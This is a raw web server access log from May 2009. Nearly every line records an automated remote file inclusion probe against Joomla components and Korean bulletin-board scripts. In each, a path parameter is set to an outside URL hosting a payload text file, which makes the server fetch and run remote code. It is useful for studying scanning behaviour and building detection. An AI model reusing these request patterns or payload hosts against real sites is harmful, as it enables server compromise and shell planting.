216.119.103.12 - - [30/May/2009:03:35:34 -0500] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:35:34 -0500] "GET /logs/access_log.1239408000/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:35:35 -0500] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:36:56 -0500] "GET /logs/access_log.1242086400/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:03:37:40 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:03:37:40 -0500] "GET /logs/access_log.1238371200//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:03:37:40 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:03:37:40 -0500] "GET /logs/access_log.1238630400//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:37:48 -0500] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:37:48 -0500] "GET /logs/access_log.1242518400///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:37:48 -0500] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:03:37:54 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:03:37:54 -0500] "GET /logs/access_log.1238371200//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:03:37:54 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:03:37:54 -0500] "GET /logs/access_log.1238630400//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:37:54 -0500] "GET /logs/access_log.1242086400/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:38:02 -0500] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:38:02 -0500] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:38:02 -0500] "GET /logs/access_log.1242000000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:38:27 -0500] "GET /logs/access_log.1240358400/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:38:44 -0500] "GET /logs/access_log.1242086400///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
65.55.208.139 - - [30/May/2009:03:39:00 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [30/May/2009:03:39:02 -0500] "GET /logs/access_log.1239494400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
64.6.231.215 - - [30/May/2009:03:39:21 -0500] "GET ///////////////////////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 200 3270 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
81.92.97.90 - - [30/May/2009:03:40:05 -0500] "GET /logs/access_log.1237680000//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
81.92.97.90 - - [30/May/2009:03:40:05 -0500] "GET //?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
81.92.97.90 - - [30/May/2009:03:40:10 -0500] "GET /logs//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:40:38 -0500] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:40:41 -0500] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:40:41 -0500] "GET /logs/access_log.1242000000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
89.234.63.110 - - [30/May/2009:03:40:44 -0500] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 356 "-""Mozilla/5.0"
89.234.63.110 - - [30/May/2009:03:40:44 -0500] "GET /logs/access_log.1242518400///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 378 "-""Mozilla/5.0"
89.234.63.110 - - [30/May/2009:03:40:44 -0500] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 351 "-""Mozilla/5.0"
89.234.63.110 - - [30/May/2009:03:40:50 -0500] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 356 "-""Mozilla/5.0"
89.234.63.110 - - [30/May/2009:03:40:50 -0500] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 351 "-""Mozilla/5.0"
89.234.63.110 - - [30/May/2009:03:40:50 -0500] "GET /logs/access_log.1242518400///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 378 "-""Mozilla/5.0"
189.14.202.124 - - [30/May/2009:03:40:54 -0500] "GET //?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
189.14.202.124 - - [30/May/2009:03:41:07 -0500] "GET /logs//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:41:13 -0500] "GET /logs/access_log.1240358400/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
89.234.63.110 - - [30/May/2009:03:41:13 -0500] "GET /logs/access_log.1242086400///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 378 "-""Mozilla/5.0"
89.234.63.110 - - [30/May/2009:03:41:14 -0500] "GET /logs/access_log.1242086400///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 378 "-""Mozilla/5.0"
189.14.202.124 - - [30/May/2009:03:41:26 -0500] "GET /logs/access_log.1237680000//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:03:42:11 -0500] "GET /logs/access_log.1242432000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:03:42:11 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:03:42:11 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:03:42:21 -0500] "GET /logs/access_log.1242086400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:42:35 -0500] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:42:37 -0500] "GET /logs/access_log.1242000000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:42:37 -0500] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:42:58 -0500] "GET ////////?cmd&file?livecam-sexy.info=http://spy.nab.su/id1.txt??? HTTP/1.1" 200 3251 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:42:58 -0500] "GET /logs/access_log.1238630400////////?cmd&file?livecam-sexy.info=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:42:58 -0500] "GET /logs/access_log.1238457600////////?cmd&file?livecam-sexy.info=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:43:00 -0500] "GET /logs////////?cmd&file?livecam-sexy.info=http://spy.nab.su/id1.txt??? HTTP/1.1" 200 191360 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:43:04 -0500] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:43:04 -0500] "GET /logs/access_log.1242000000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:43:04 -0500] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
91.149.157.130 - - [30/May/2009:03:43:06 -0500] "GET /logs/access_log.1235692800//include/mail.inc.php?skin_board_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
121.165.73.157 - - [30/May/2009:03:43:07 -0500] "GET ////////?cmd&file?livecam-sexy.info=http://spy.nab.su/id1.txt??? HTTP/1.1" 200 3251 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:43:07 -0500] "GET /logs/access_log.1238457600////////?cmd&file?livecam-sexy.info=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:43:07 -0500] "GET /logs/access_log.1238630400////////?cmd&file?livecam-sexy.info=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:43:09 -0500] "GET /logs////////?cmd&file?livecam-sexy.info=http://spy.nab.su/id1.txt??? HTTP/1.1" 200 191360 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:43:18 -0500] "GET /logs/access_log.1240358400/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:43:41 -0500] "GET /logs/access_log.1240358400/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:43:54 -0500] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:43:54 -0500] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:43:54 -0500] "GET /logs/access_log.1242000000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
91.149.157.130 - - [30/May/2009:03:44:03 -0500] "GET /logs/access_log.1235692800//include/mail.inc.php?skin_board_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
85.17.162.28 - - [30/May/2009:03:44:23 -0500] "GET /logs/access_log.1240358400/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:44:50 -0500] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:44:50 -0500] "GET /logs/access_log.1239408000/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:44:50 -0500] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:44:58 -0500] "GET /logs/access_log.1242086400/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
67.212.14.88 - - [30/May/2009:03:45:11 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://omgevingsscan.nl/jaap/MADONGCMD.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
67.212.14.88 - - [30/May/2009:03:45:11 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://omgevingsscan.nl/jaap/MADONGCMD.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
85.17.162.28 - - [30/May/2009:03:45:12 -0500] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:45:12 -0500] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:45:15 -0500] "GET /logs/access_log.1242000000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:45:45 -0500] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:45:45 -0500] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:45:45 -0500] "GET /logs/access_log.1239408000/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:45:49 -0500] "GET /logs/access_log.1240358400/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:45:53 -0500] "GET /logs/access_log.1242086400/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:45:57 -0500] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:45:57 -0500] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:45:57 -0500] "GET /logs/access_log.1239408000/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:46:00 -0500] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:46:00 -0500] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:46:00 -0500] "GET /logs/access_log.1239408000/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:46:02 -0500] "GET /logs/access_log.1242086400/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:46:04 -0500] "GET /logs/access_log.1242086400/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
77.79.12.5 - - [30/May/2009:03:46:45 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
77.79.12.5 - - [30/May/2009:03:46:48 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
213.203.223.93 - - [30/May/2009:03:47:29 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [30/May/2009:03:47:29 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [30/May/2009:03:47:29 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
87.106.135.14 - - [30/May/2009:03:48:15 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://omgevingsscan.nl/jaap/MADONGCMD.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [30/May/2009:03:48:15 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://omgevingsscan.nl/jaap/MADONGCMD.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
88.191.103.144 - - [30/May/2009:03:48:20 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://omgevingsscan.nl/jaap/MADONGCMD.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
88.191.103.144 - - [30/May/2009:03:48:20 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://omgevingsscan.nl/jaap/MADONGCMD.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
61.19.251.89 - - [30/May/2009:03:51:59 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://cocoking.com/upload/gallery/id.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
61.19.251.89 - - [30/May/2009:03:51:59 -0500] "GET //include/mail.inc.php?skin_board_path=http://cocoking.com/upload/gallery/id.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
72.18.148.82 - - [30/May/2009:03:54:29 -0500] "GET /phphtml.php?htmlclass_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:03:54:29 -0500] "GET /logs/phphtml.php?htmlclass_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:03:54:29 -0500] "GET /logs/access_log.1240790400/phphtml.php?htmlclass_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.106.206 - - [30/May/2009:03:55:08 -0500] "GET /logs/access_log.1173312000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.138.206.192 - - [30/May/2009:03:56:24 -0500] "GET /logs/access_log.1233619200///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
193.138.206.192 - - [30/May/2009:03:56:24 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
193.138.206.192 - - [30/May/2009:03:56:26 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 191355 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:56:30 -0500] "GET /logs/access_log.1240531200//include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:56:30 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:56:30 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
193.138.206.192 - - [30/May/2009:03:57:07 -0500] "GET /logs/access_log.1238889600///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:57:35 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:57:35 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:57:35 -0500] "GET /logs/access_log.1240531200//include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
